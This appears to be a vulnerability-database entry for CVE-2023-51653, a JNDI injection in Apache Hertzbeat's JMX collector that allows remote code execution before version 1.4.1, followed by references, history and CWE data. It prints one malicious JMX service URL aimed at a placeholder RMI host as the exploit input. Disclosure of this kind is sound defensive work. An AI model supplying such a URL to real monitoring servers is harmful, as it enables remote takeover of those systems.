Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be used by default. When the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue.
References
Configurations
History
16 Jan 2025, 19:04
Type | Values Removed | Values Added |
---|---|---|
References | () https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef - Patch | |
References | () https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg - Exploit, Vendor Advisory | |
CPE | cpe:2.3:a:apache:hertzbeat:*:*:*:*:*:*:*:* | |
First Time |
Apache
Apache hertzbeat |
Information
Published : 2024-02-22 16:15
Updated : 2025-01-16 19:04
NVD link : CVE-2023-51653
Mitre link : CVE-2023-51653
CVE.ORG link : CVE-2023-51653
JSON object : View
Products Affected
apache
- hertzbeat
CWE
CWE-74
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')